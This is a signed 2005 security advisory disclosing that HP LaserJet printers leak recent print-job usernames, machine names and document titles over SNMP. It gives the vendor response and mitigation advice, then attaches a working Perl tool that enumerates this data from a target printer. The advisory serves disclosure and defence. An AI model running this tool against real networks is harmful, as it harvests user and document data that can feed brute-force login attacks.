-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ================================================================= P . T . L . P I N I O N S T E K N I S K A L A B O R A T O R I U M (The Pinion Technical Laboratory) http://www.pinion.se Advisory ================================================================= Vulnerability Name - - ------------------ HP LaserJet Network Username and Information Enumeration Pinion ID - - --------- PTL_advisory_050825 Author - - ------ George Hedfors Class - - ----- Configuration Error Remote - - ------ Yes Local - - ----- N/A Discovered - - ---------- August 25 2005 Published - - --------- September 15 2005 Updated - - ------- N/A Credit - - ------ This vulnerability was found by George Hedfors. Vulnerable - - ---------- HP LaserJet 2430 Possibly other HP printers that operate using the Jetdirect controls. Discussion - - ---------- HP LaserJet printers has an extensive administrative user interface provided over SNMP. SNMP is normally used for monitoring applications and servers performance but can also be used to perform remote configurations. Pinion has discovered that HP LaserJet printers store information regarding recently printed documents. Information such as document name, title, number of pages, document size, user who has printed the document and the machine name where the print job was initiated. This document information "cache" is flushed when the document is older then one hour but in mean time, the information can be obtained by anyone with access to the network and who has information regarding the "public" SNMP community configured at the printer. In reality, an intruder could use this information to obtain possible usernames that later could be used in a login brute force attack against servers. Hewlet Packard was informed about this issue on September 7, 2005. Vendor response: "This information is kept by the printer in the printer specific MIB. Jetdirect controls the authentication and subsequent authorization to all the MIBs. This authentication/ authorization can be controlled via SNMP settings." HP tracking number: SSRT051032 Solution - - -------- There is no direct way to prevent the printer from exposing information about recently printed documents except for disabling SNMP. Access to administrative features of the LaserJet, including SNMP, can be controlled and limited in various ways depending on the security requirements of the customer's environment. For more information please refer to "HP Jetdirect Embedded Print Server Administrator's Guide", chapter 7 - Security Features. References - - ---------- "HP Jetdirect Embedded Print Server Administrator's Guide" http://h20000.www2.hp.com/bizsupport/TechSupport/DocumentIndex.jsp? locale=en_US&contentType=SupportManual&docIndexId=3124& prodTypeId=18972&prodSeriesId=416419&lang=en&cc=us Additional information regarding HP Jetdirect security is available here: http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp? objectID=bpj05999 http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp? objectID=c00004828 Exploit - - ------- The tool attached provides a possibility to extract the described information. #!/usr/bin/perl ##################################################################### ## ## HP LaserJet SNMP User name enumeration tool v0.2 by ## Pinion Labs 050705 ## george[46]hedfors[64]pinion[46]se ## http://www.pinion.se ## ## Description ## HP LaserJet printers loggs recent printed documents with ## timestamp, size, number of pages, username and machine name. ## These can be extracted using a specially crafted SNMP Object ID. ## ## Document name under 1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.1 ## Document pages under 1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.12 ## Document size under 1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.14 ## Usernames are found under 1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.23.1 ## Machine names under 1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.23.2 ## ## Output format ## DocID:Username:Machine:Pages:Size:DocName ## ## use Net::SNMP; ## Number of errors in row that is tolerated before exit $tolerance = 10; ## Default SNMP community to use $defcommunity = "public"; ## Default SNMP port to use $defport = 161; ### END OF CONFIG ### $host = $ARGV[0] || die "syntax: $0 victim.com \[community\] ". "\[startid\]\n"; $community = $ARGV[1] || $defcommunity; $startid = $ARGV[2] || 0; ($session, $error) = Net::SNMP->session(-hostname => $host, -community => $community, -port => $defport); if (!defined($session)) { printf("ERROR: %s.\n", $error); exit 1; } for($i = $startid; $err < $tolerance; $i++) { $oid = "1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.23.1.$i.0"; $result = $session->get_request(-varbindlist => [$oid]); if (!defined($result)) { if($found > 0) { $err++; } } else { $found++; ($null, $user) = split(/\=/, $result->{$oid}, 2); $oid = "1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.23.2.$i.0"; $result = $session->get_request(-varbindlist => [$oid]); ($null, $id) = split(/\=/, $result->{$oid}, 2); $oid = "1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.1.$i.0"; $result = $session->get_request(-varbindlist => [$oid]); $doc = hex2ascii($result->{$oid}); $oid = "1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.12.$i.0"; $result = $session->get_request(-varbindlist => [$oid]); $pages = $result->{$oid}; $oid = "1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.14.$i.0"; $result = $session->get_request(-varbindlist => [$oid]); $size = $result->{$oid}; printf("%d:%s:%s:%s:%s:%s\n", $i, $user, $id, $pages, $size, $doc); $err = 0; } } $session->close; exit 0; sub hex2ascii() { my $hex = shift; my $asc; for($n = 6; $n < length($hex); $n += 2) { $asc .= chr(hex(substr($hex, $n, 2))); } return $asc; } -----BEGIN PGP SIGNATURE----- Version: PGP 8.1 iQA/AwUBQykij3/1dBNpei3QEQKgnQCfULMT+VkrGLe9dJLx/3oAB8gP/B4An0Xe of2e6qiAGjUV6noguEpAloBm =h5Fv -----END PGP SIGNATURE-----